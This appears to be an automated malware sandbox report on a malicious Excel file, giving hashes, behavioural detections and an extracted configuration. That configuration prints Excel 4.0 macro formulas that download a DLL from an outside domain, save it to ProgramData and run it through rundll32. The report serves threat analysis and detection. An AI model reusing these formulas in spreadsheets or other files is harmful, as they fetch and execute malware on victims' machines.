General
-
Target
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.zip
-
Size
61KB
-
Sample
200423-q5tnjca8x2
-
MD5
b5102277fec5cf20132d3d542cf4648e
-
SHA1
40610a77a25e9ff604f7e6f9320e8dab8036a142
-
SHA256
876752ccf051c21b583d504ed35353b986a38545fc8feeb399fceb3efdf035f7
-
SHA512
eb45d4953505fe4552434c5a5fe666b4e8d83918245f31214b1c3b1ed6bb3b817f8e46725716982e4c835e55f7ab1903025672fee76e7299b5e003d86dd0dd32
Static task
static1
Behavioral task
behavioral1
Sample
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls
Resource
win7v200410
Malware Config
Extracted
http://gveejlsffxmfjlswjmfm.com/files/april23.dll
-
formulas
=CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://gveejlsffxmfjlswjmfm.com/files/april23.dll","C:\ProgramData\todxofs.dll",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\ProgramData\todxofs.dll,DllRegisterServer",0,0) =HALT()
Targets
-
-
Target
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls
-
Size
76KB
-
MD5
228003634e57d37f08787be02c0b6c14
-
SHA1
0e71bb6f250012609c08adf74d1cec6587b6cc05
-
SHA256
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908
-
SHA512
5adcc817a196ef0cfc176d089564d8d87528e0a69134287b8858907a8e97040bdbc05b0b5d87db9a9856e641673c27effc3bed5f70754e87dbbef0d64dfa1375
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Blacklisted process makes network request
-
Loads dropped DLL
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-
Suspicious use of SetThreadContext
-